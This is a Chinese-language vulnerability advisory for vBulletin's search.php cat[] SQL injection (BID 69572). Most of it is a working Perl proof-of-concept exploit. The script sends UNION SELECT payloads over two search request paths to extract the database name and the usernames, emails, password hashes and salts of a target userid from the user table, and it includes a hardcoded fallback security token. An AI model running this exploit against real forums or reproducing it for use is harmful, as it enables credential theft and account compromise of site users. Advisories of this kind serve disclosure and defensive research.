发布日期:2014-09-03
更新日期:2014-09-04
受影响系统:
VBulletin VBulletin
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69572
VBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。
vBulletin 的 search.php 在处理 cat[] 参数时未对其做充分过滤，存在SQL注入漏洞；攻击者可在该参数中拼接 UNION SELECT 查询，成功利用后可执行未授权数据库操作（下方测试代码即用此方式读取 user 表中的用户名、邮箱、密码散列和盐值）。
<*来源:D35m0nd142
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
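#!/usr/bin/env perl
# vBulletin search.php "cat[]" SQL injection PoC (BID 69572).
#
# Positional arguments read by the code in this file:
#   $ARGV[0]  base URL of the forum, e.g. http://host/forum (no trailing slash)
#   $ARGV[3]  search query string sent in the "query=" form field
#   $ARGV[4]  userid whose row is read from the `user` table
# $ARGV[1] and $ARGV[2] are not referenced in this part of the script.
use LWP::UserAgent;
use HTTP::Cookies;
# 'strict' is deliberately not enabled: the subs below rely on package globals
# ($ua, @tofinds, $tofind, $post, $want) and on helpers defined elsewhere in the file.
use warnings;

# Shared HTTP client. The cookie jar keeps the session across requests so the
# securitytoken extracted later stays valid for the follow-up POSTs.
$ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0");
$ua->cookie_jar({});

# Each payload completes the "UNION SELECT concat(0x3a,0x3a,0x3a," prefix that the
# request subs place in cat[0]: it closes concat() with a column name, reads that column
# from the `user` table for the requested userid, and comments out the remainder of the
# server-side query with '#'.
# NOTE(review): $ARGV[4] is interpolated into SQL without validation; it is meant to be
# a numeric userid.
$username = "username) from user where userid=$ARGV[4]#";
$email    = "email) from user where userid=$ARGV[4]#";
$password = "password) from user where userid=$ARGV[4]#";
$salt     = "salt) from user where userid=$ARGV[4]#";

# Probe order: database name first, then the four user-table columns.
@tofinds = ('database())#', $username, $email, $password, $salt);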
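# First exploitation path: POST each payload in cat[0] to search.php?search_type=1
# (the social-group search form), follow the Location: header the server replies
# with, save the result page to vbout.txt and let dumping() extract the ':::'-prefixed
# value from it. Afterwards offers to run the second path.
#
# Uses the file-level globals $ua and @tofinds and the helpers dumping(), printout()
# and banner(), all defined elsewhere in this script. Expects vbloginout.txt to have
# been written by an earlier step (presumably the login) that is not part of this sub.
# Side effects: writes vbloc.txt and vbout.txt in the current directory, reads STDIN.
sub request
{
    my $token = dumping("vbloginout.txt","token");
    if($token eq '')
    {
        print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
        # NOTE(review): this fallback is a token captured from the author's own session
        # (the leading number is a 2014 Unix timestamp). vBulletin ties securitytoken to
        # the session, so another install is unlikely to accept it; if every probe fails,
        # check the response for a "security token was invalid" message first.
        $token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e";
        print "Attempting using $token as token.\n";
    }
    else
    {
        print "SECURITYTOKEN FOUND: $token\n";
    }
    print "Sending exploit...\n\n";
    sleep(1);

    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1');
    $req->content_type('application/x-www-form-urlencoded');

    foreach my $tofind (@tofinds)
    {
        # "1)" closes the parenthesised expression the server builds around cat[];
        # $tofind supplies the column, the source table and the trailing '#' comment.
        my $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
        $req->content($post);
        my $res = $ua->request($req);

        # dumping() reads the Location: header back out of vbloc.txt.
        open(my $hdr_fh, '>', 'vbloc.txt') or die "cannot write vbloc.txt: $!";
        print {$hdr_fh} $res->headers()->as_string;
        close($hdr_fh) or die "cannot close vbloc.txt: $!";
        my $location = dumping("vbloc.txt","loc");

        # No redirect back to the target means the search was rejected (bad token, etc.).
        # \Q...\E stops '.', '?' and '+' in the URL from acting as regex metacharacters.
        if($location !~ /\Q$ARGV[0]\E/)
        {
            banner();
            # The original wrote 'break', which is not a Perl keyword here and was a
            # silent no-op; 'last' is what was intended.
            last;
        }

        my $req1 = HTTP::Request->new(GET => $location);
        $req1->content_type('application/x-www-form-urlencoded');
        my $res1 = $ua->request($req1);

        # The result page is handed to dumping() via vbout.txt.
        open(my $out_fh, '>', 'vbout.txt') or die "cannot write vbout.txt: $!";
        print {$out_fh} $res1->content;
        close($out_fh) or die "cannot close vbout.txt: $!";

        printout($tofind);
        dumping("vbout.txt","sql");
        print "\n";
    }
    print "\n";

    print "Do you want to run the second exploitation way? (y/n) -> ";
    my $want = <STDIN>;
    if(defined $want && $want =~ /y/)
    {
        second_request($token);
    }
}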
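# Second exploitation path: same cat[0] injection, but sent to the generic
# search.php form (type[]=7) instead of search_type=1. For each payload the
# Location: header is followed and the result page saved for dumping().
#
# Arguments:
#   $token  securitytoken obtained (or guessed) by request()
# Uses the file-level globals $ua and @tofinds and the helpers dumping(), printout()
# and banner(). Unlike request(), a rejected search terminates the whole script
# with exit(1). Side effects: writes vbloc.txt and vbout.txt in the current directory.
sub second_request
{
    my ($token) = @_;
    print "Attempting using the second exploitation way..\n\n";
    sleep(2);

    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php');
    $req->content_type('application/x-www-form-urlencoded');

    foreach my $tofind (@tofinds)
    {
        # Same injection shape as request(): "1)" closes the server-side expression,
        # $tofind closes concat(), names the column/table and ends with '#'.
        my $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
        $req->content($post);
        my $res = $ua->request($req);

        open(my $hdr_fh, '>', 'vbloc.txt') or die "cannot write vbloc.txt: $!";
        print {$hdr_fh} $res->headers()->as_string;
        close($hdr_fh) or die "cannot close vbloc.txt: $!";
        my $location = dumping("vbloc.txt","loc");

        # \Q...\E: match the base URL literally rather than as a regex.
        if($location !~ /\Q$ARGV[0]\E/)
        {
            banner();
            exit(1);
        }

        my $req1 = HTTP::Request->new(GET => $location);
        $req1->content_type('application/x-www-form-urlencoded');
        my $res1 = $ua->request($req1);

        open(my $out_fh, '>', 'vbout.txt') or die "cannot write vbout.txt: $!";
        print {$out_fh} $res1->content;
        close($out_fh) or die "cannot close vbout.txt: $!";

        printout($tofind);
        dumping("vbout.txt","sql");
        print "\n";
    }
    print "\n";
}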